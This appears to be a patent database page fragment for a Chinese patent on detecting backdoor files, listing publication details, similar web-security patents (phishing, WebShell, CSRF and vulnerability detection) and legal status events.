CN105933268A (zh) * | 2015-11-27 | 2016-09-07 | 中国银联股份有限公司 | 一种基于全量访问日志分析的网站后门检测方法及装置 |
Also Published As
Publication number | Publication date |
---|---|
CN108322420A (zh) | 2018-07-24 |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
CN110324311B (zh) | 漏洞检测的方法、装置、计算机设备和存储介质 | |
CN108683666B (zh) | 一种网页识别方法及装置 | |
Alaca et al. | Device fingerprinting for augmenting web authentication: classification and analysis of methods | |
US7467402B2 (en) | Automated login session extender for use in security analysis systems | |
CN111651757B (zh) | 攻击行为的监测方法、装置、设备及存储介质 | |
Pan et al. | Anomaly based web phishing page detection | |
US10469531B2 (en) | Fraud detection network system and fraud detection method | |
US8893282B2 (en) | System for detecting vulnerabilities in applications using client-side application interfaces | |
US10721271B2 (en) | System and method for detecting phishing web pages | |
US20180103043A1 (en) | System and methods of detecting malicious elements of web pages | |
US9749305B1 (en) | Malicious client detection based on usage of negotiable protocols | |
CN108322420B (zh) | 后门文件的检测方法和装置 | |
CN107896219B (zh) | 一种网站脆弱性的检测方法、系统及相关装置 | |
CN107040518B (zh) | 一种私有云服务器登录方法及系统 | |
CN105635064B (zh) | Csrf攻击检测方法及装置 | |
CN107612926B (zh) | 一种基于客户端识别的一句话WebShell拦截方法 | |
CN107733853B (zh) | 页面访问方法、装置、计算机和介质 | |
CN109672658B (zh) | Json劫持漏洞的检测方法、装置、设备及存储介质 | |
US20230336589A1 (en) | Detection of User Interface Imitation | |
US20190268373A1 (en) | System, method, apparatus, and computer program product to detect page impersonation in phishing attacks | |
US20120204242A1 (en) | Protecting web authentication using external module | |
RU2638779C1 (ru) | Способ и сервер для вьполнения авторизации приложения на электронном устройстве | |
US7360092B1 (en) | Marking and identifying web-based authentication forms | |
CN104660556A (zh) | 跨站伪造请求漏洞检测的方法及装置 | |
CN111523123A (zh) | 一种网站漏洞智能检测方法 |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
SE01 | Entry into force of request for substantive examination | ||
GR01 | Patent grant | ||
GR01 | Patent grant |